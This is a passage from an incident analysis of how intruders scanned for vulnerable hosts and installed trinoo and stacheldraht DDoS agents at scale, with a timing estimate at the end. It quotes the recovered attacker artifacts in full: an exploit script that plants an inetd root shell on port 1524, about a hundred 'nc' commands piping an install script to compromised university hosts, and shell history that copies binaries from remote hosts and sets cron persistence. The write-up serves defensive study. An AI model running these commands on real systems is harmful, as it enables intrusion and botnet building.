In the directory were found tools for scanning entire Class B network blocks, several remote buffer overrun exploits, and denial of service programs. There were log files that are assumed to be lists of potential victim systems. Two such files (and line -- meaning host -- counts) are:
The intruders were scanning the Internet for systems that have a known vulnerability, then compromising them using the following script, passing it the IP address of each "vulnerable" system:41660 com.domains 10549 216 52209 total
The resulting systems that were successfully penetrated (as identified by filtering the output for signs of a successful "telnet" connection to the backdoor shell) was then used to generate another script. One such script was still in the cache, and contained a list of 100 such compromised systems (fully qualified domain names added at the end of the line for clarity):./r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \ >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob" ./r -6 $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \ >>/tmp/bob; /usr/sbin/inetd -s /tmp/bob" echo Sleeping 2 seconds... sleep 2 telnet $1 1524
The script "trin.sh" being piped to the backdoor port on each compromised system does the actual installation of a trinoo DDoS agent on each system:./trin.sh | nc 128.172.XXX.XXX 1524 & XXXXXX.egr.vcu.edu ./trin.sh | nc 128.172.XXX.XXX 1524 & XXXXXX.egr.vcu.edu ./trin.sh | nc 128.172.XXX.XXX 1524 & XXXXXX.egr.vcu.edu ./trin.sh | nc 128.172.XXX.XX 1524 & XXXXXXXX.mas.vcu.edu ./trin.sh | nc 128.3.X.XX 1524 & XXXXXXXX.lbl.gov ./trin.sh | nc 128.3.X.XX 1524 & XXXXXXX.lbl.gov ./trin.sh | nc 128.3.X.XXX 1524 & XXXXXX.lbl.gov ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.cns.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXXX.cns.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXX.cns.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXX.cns.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.emporium.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.fw.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.ee.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.ee.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXX.ece.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXX.cimss.vt.edu ./trin.sh | nc 128.173.XX.XX 1524 & XXXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XX.XXX 1524 & XXXXXX.ise.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXXX.geog.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXXX.geog.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXXX.geog.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & ./trin.sh | nc 128.173.XXX.XXX 1524 & ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXXXX.esm.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXXX.geol.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXX.geol.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXX.me.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXX.esm.vt.edu ./trin.sh | nc 128.173.XXX.XXX 1524 & XXXXXX.mine.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXXX.isis.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXXXXX.isis.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXXXXX.ento.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXXX.ento.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXXXXX.bse.vt.edu ./trin.sh | nc 128.173.XXX.XX 1524 & XXXX.sv.vt.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXXXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXX.agecon.uiuc.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXXXXXXX.ps.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXX.psych.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.ehs.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & ./trin.sh | nc 128.174.XX.XX 1524 & XXXXXXX.geology.uiuc.edu ./trin.sh | nc 128.174.XX.XX 1524 & XXXX.nres.uiuc.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXXXXXX.animal.uiuc.edu ./trin.sh | nc 128.174.XX.XXX 1524 & XXXX.music.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.math.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXX.stat.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXX.me.uiuc.edu ./trin.sh | nc 128.174.XXX.XXX 1524 & XXXXXXX.me.uiuc.edu
Found in December 1999 on a stacheldraht agent, identified with the "gag" scanner, was the following shell .history file (the semi-colon is required by some remote exploit shells):echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit"
The numbers are Unix timestamps. Converting the first and last ones shows how long it took to root the system, set up a DDoS agent, and clean up:#+0946131241 ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp && chmod 755 ./.tmp && ./.tmp && rm -f .tmp ; #+0946131241 rm -rf /usr/lib/libx ; #+0946131241 mkdir /usr/lib/libx ; #+0946131241 mkdir /usr/lib/libx/... ; #+0946131241 cd /usr/lib/libx/.../ ; #+0946131241 rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ; #+0946131244 nohup ./ttymon ; #+0946131244 rm -rf ./ttymon ;
Just over three seconds.% ctime 0946131241 Sat Dec 25 6:14:01 1999 % ctime 0946131244 Sat Dec 25 6:14:04 1999
Assuming 3 to 6 seconds for each host, and pre-selection of the target systems, it would have taken somewhere around 2 - 4 hours to set up the network of 2,200 systems used against the University of Minnessota in August 1999. Reports from at least one site in the US, which recovered a syslog file showing rcp transfers, confirmed that thousands of systems can be set up in this manner in a matter of a few hours. (The preliminary scanning/sorting itself would presumably take days or weeks to accomplish, but would generate very little attention at most sites.)